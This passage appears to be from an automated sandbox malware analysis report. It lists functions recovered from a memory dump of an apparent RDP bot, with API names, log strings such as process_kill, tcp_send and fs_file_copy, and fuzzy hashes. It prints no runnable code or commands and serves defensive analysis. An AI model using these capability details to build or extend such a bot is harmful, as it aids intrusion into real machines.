                    • API String ID: 173675053-901114122
                    • Opcode ID: 2a18ed06137615cc2e3be02c7ef5ccd0eec216c6ef9130008c554d3555423c7b
                    • Instruction ID: 8a36271abc26bc418c0f818f00dd255618f89af40e5d373b805e241948305869
                    • Opcode Fuzzy Hash: 2a18ed06137615cc2e3be02c7ef5ccd0eec216c6ef9130008c554d3555423c7b
                    • Instruction Fuzzy Hash: A851E572A0C74652EB509BA9E4703BAA751EB447C4F540031EB8E4BAD5EF3DF9448740
                    Function 00007FF8BFB5B4D4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    • Opcode ID: 0d80a45c6b63d9cc7037bdbc81b3f4d110de44327046f7773fcc65a7367fa378
                    • Instruction ID: ca852b4809faaed10ab74db7a1b6d662b11e4ab32ef3c2829aa655765d0f9a9e
                    • Opcode Fuzzy Hash: 0d80a45c6b63d9cc7037bdbc81b3f4d110de44327046f7773fcc65a7367fa378
                    • Instruction Fuzzy Hash: 90218C11A0A70396FE655B9EA4A037A6381AF557C0F089035CF4E5A691EF2DF8448340
                    Function 00007FF8BFB5B3C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    • Opcode ID: 87b4197cd9f34c5eb04993c6019d3506ae22fe7ba9a7b67b46b5ee6a4f420728
                    • Instruction ID: 60eb1cd37dccf0b3cfd519e643fb56468873b4a7ca2da948e313a9e05f93115a
                    • Opcode Fuzzy Hash: 87b4197cd9f34c5eb04993c6019d3506ae22fe7ba9a7b67b46b5ee6a4f420728
                    • Instruction Fuzzy Hash: F4218922A0A70396FE659BAEA5A037A6381AF557C0F089035DF0E5A691EF2DF8448340
                    Function 00007FF8BFB5B3CC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    • Opcode ID: d4c386ed4f02e9339dd4c2f6c6e840fef5e27a6134c9153b478a0e26d912db7d
                    • Instruction ID: 3274c02279f7df559014b8a89b83fa20c154a32ad3d811fca1e4a8d123480449
                    • Opcode Fuzzy Hash: d4c386ed4f02e9339dd4c2f6c6e840fef5e27a6134c9153b478a0e26d912db7d
                    • Instruction Fuzzy Hash: 01218922B0A70396FE659BAEA5A037A6381AF557C1F089035DF0E5A691EF2DF8448340
                    Function 00007FF8BFB5B3D3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                    • API String ID: 477549591-1116693529
                    • Opcode ID: 37ee8ffaf0a2d8da3035a1d1cae7e076087a7bfd7fb2618ce8062491b4793440
                    • Instruction ID: 2b1c54767a0cdc2a096d72d6e6c7024e8b8a18a54968c2983eab1c9936ab9a01
                    • Opcode Fuzzy Hash: 37ee8ffaf0a2d8da3035a1d1cae7e076087a7bfd7fb2618ce8062491b4793440
                    • Instruction Fuzzy Hash: 18218C11A0A70396FE655BDEA5A037A6381AF557C0F089035DF0E5A691EF2DF8448340
                    Function 00007FF8BFB563D1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    • Opcode ID: 736f15b1d810f9389d05397dcf2465c9d1ea4c2464552a021d8d7ad4e332b8b1
                    • Instruction ID: edb381a05fed80461f3f828be4dd34f75ce03f0588528acbc80d3ebb9a3d38b9
                    • Opcode Fuzzy Hash: 736f15b1d810f9389d05397dcf2465c9d1ea4c2464552a021d8d7ad4e332b8b1
                    • Instruction Fuzzy Hash: 2B419351D2DA6A91FA298E8DE5203796752BF04BD8F54013ADF0F4B694EE6CF6828301
                    Function 00007FF8BFB52C0D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    • Opcode ID: 216b4cb1717b09bc2c3ee7bf0a43e15c9c894d7082d127124da279e8c6c66fe8
                    • Instruction ID: c3ad30682e9c08cf38e5f4d5e836457b9a9500e07201cd5e2456061e2a108106
                    • Opcode Fuzzy Hash: 216b4cb1717b09bc2c3ee7bf0a43e15c9c894d7082d127124da279e8c6c66fe8
                    • Instruction Fuzzy Hash: C421AC91B1A64361FA204BADA9916B9B3817F14BF0F544330EF2D4AEE2DE2CF5858740
                    Function 00007FF8BFB51854 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 187memorystringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Heap_errno$ErrorFreeLastProcessfopenfseeksendstrcpy
                    • String ID: ($-RGMLWD-$ORRE
                    • API String ID: 1421482426-2390005167
                    • Opcode ID: d34eae1974ff341f97d7c99ab41b8c4f76de5e86e75233f67acac676b4a36d35
                    • Instruction ID: da67f72a295fa7e9f8f0895041e434ec094ea222db88a5b76ee57dd40cb1cf8b
                    • Opcode Fuzzy Hash: d34eae1974ff341f97d7c99ab41b8c4f76de5e86e75233f67acac676b4a36d35
                    • Instruction Fuzzy Hash: E671B576A0C64282FB6096ADE4703BD77519B41BE4F140232EB6E1BBD5DF2DF8458B40
                    Function 00007FF8BFB5100C Relevance: 9.1, APIs: 6, Instructions: 101sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Sleep_amsg_exit$_initterm
                    • String ID:
                    • API String ID: 2193611136-0
                    • Opcode ID: 799de848f8585fc26dd49ddfba2fb1f87f28928e1ba97ec1f505cd326fa094cc
                    • Instruction ID: ab440aa06b02aef4da7db809a5fa3ef728af2f89bd41e4e447935d1fa2664b6a
                    • Opcode Fuzzy Hash: 799de848f8585fc26dd49ddfba2fb1f87f28928e1ba97ec1f505cd326fa094cc
                    • Instruction Fuzzy Hash: E7412735A1964295FB919BDED870279B3A1AF48BC4F288431DF0D87395EE2CF8408341
                    Function 00007FF8BFB5C305 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: (pi != NULL)$H:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                    • API String ID: 2962429428-2428953624
                    • Opcode ID: 262986059aaff05045a5af0fa962c9e24c7621cb0906d0cdcb9ca0c611095dc3
                    • Instruction ID: 91af76d4ce763a1469ae3810d681f6c9344dfefc1f2aa4718383cd585e1a5a94
                    • Opcode Fuzzy Hash: 262986059aaff05045a5af0fa962c9e24c7621cb0906d0cdcb9ca0c611095dc3
                    • Instruction Fuzzy Hash: 62F015A1A0985FA1FB00DBA9FC202A87721AF547C8F840136DF0D1B2A4DE3CE947C340
                    Function 00007FF8BFB523B2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    • Opcode ID: 41da1011352ac3ce5c174a998859568254df64b25cf04e920bef0f25f82aa8c3
                    • Instruction ID: 62ea94b71d9b1a3ed196e4615cc0c76344c525505a52edc6b38924062bf9efaf
                    • Opcode Fuzzy Hash: 41da1011352ac3ce5c174a998859568254df64b25cf04e920bef0f25f82aa8c3
                    • Instruction Fuzzy Hash: 62F05E61E0D553A5FA206BADFCA50B97750AF247D0F544132EB0C869E1EE3CE58AC300
                    Function 00007FF8BFB52415 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    • Opcode ID: 42b0d0fea404e4121259a3932885e8e7ae0d755d0da3df266dcb12d97c28eaed
                    • Instruction ID: b7c275f8da19263d7ebf9c8ddb8851b1c7483999b53b72b9730bd039770e4423
                    • Opcode Fuzzy Hash: 42b0d0fea404e4121259a3932885e8e7ae0d755d0da3df266dcb12d97c28eaed
                    • Instruction Fuzzy Hash: DBF05E60E09543A1FA206BEEA8650BC73519F607F0F541332D73D469E2AE3CF5868300
                    Function 00007FF8BFB5342C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CriticalDeleteSectionfclose
                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                    • API String ID: 3387974148-4247581856
                    • Opcode ID: 5afe0d6bd3b49cf838580e1fdd059aabc03d8400c0e606afa365b2625190c44c
                    • Instruction ID: 09a3dae529d8acdeb2a46ae47ab0ba87e0e8a578519b4aa9f6f55cc05baccf91
                    • Opcode Fuzzy Hash: 5afe0d6bd3b49cf838580e1fdd059aabc03d8400c0e606afa365b2625190c44c
                    • Instruction Fuzzy Hash: 78F03461E2E683B5FA089BDCE8A8374B770AF503C8F488035C60D46BA0DF7CB0498390
                    Function 00007FF8BFB524E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                    • API String ID: 1729277954-536111009
                    • Opcode ID: 8e6f3ac9bbc209cb9ba3fd84893b2c697eba45bce8f2a528690ca1bc4aa44eaa
                    • Instruction ID: d5edb7a2690c8b41bcaeb9b1fba40d599515fa90fb50351a7167c4f020de5ff3
                    • Opcode Fuzzy Hash: 8e6f3ac9bbc209cb9ba3fd84893b2c697eba45bce8f2a528690ca1bc4aa44eaa
                    • Instruction Fuzzy Hash: 8AF0B461A1854296F7509F9DF800569B760BF887D0F108231EF6D83BE4EE3CD54A8B00
                    Function 00007FF8BFB52F97 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Cleanupfflushfwrite
                    • String ID: Done$[I] (%s) -> %s$net_cleanup
                    • API String ID: 1441811225-3926276259
                    • Opcode ID: 60bf99e75f055a99f3c96c9544a29d7d308a355ece3f6473fd6c0a06cebb9dcd
                    • Instruction ID: 85c5796cad49bea4f056e32d3028fb9840bc299f15c227314b9a76673621b80a
                    • Opcode Fuzzy Hash: 60bf99e75f055a99f3c96c9544a29d7d308a355ece3f6473fd6c0a06cebb9dcd
                    • Instruction Fuzzy Hash: 03D00258E5A587B1FD046FDDEC550E57361EF683C4F945431C60D019619E3CF29AC750
                    Function 00007FF8BFB60860 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Byte$CharMultiWide$Lead_errno
                    • String ID:
                    • API String ID: 2766522060-0
                    • Opcode ID: e8253d56d0b58ad1b64e691326fc3e79f2b663f54273177497c3c234157879e1
                    • Instruction ID: 9317a04fa7476c8be615d7717bcbc44b63ed2ee466dc5c35a1614e87327650d4
                    • Opcode Fuzzy Hash: e8253d56d0b58ad1b64e691326fc3e79f2b663f54273177497c3c234157879e1
                    • Instruction Fuzzy Hash: 1E319172A1C2829AFB704F6EE41037DBB91AB957C8F088135EB88477D5DA7CD5458B00
                    Function 00007FF8BFB55B0D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: fclose
                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                    • API String ID: 3125558077-1073242539
                    • Opcode ID: d0d3c988c06b2d366a7484f326da4dc4b26bbbf2a867e45f47f7a2833708fe31
                    • Instruction ID: 1fdb397a2cbe78cace0cd9996cd2d34cf93ff475ba00e3d9a2d92397a53f2e2d
                    • Opcode Fuzzy Hash: d0d3c988c06b2d366a7484f326da4dc4b26bbbf2a867e45f47f7a2833708fe31
                    • Instruction Fuzzy Hash: 77F05E23B0960651F9529A8CB4A1BBD63412F403EEF4D5531CF4D0A6C5EE3DB8C79200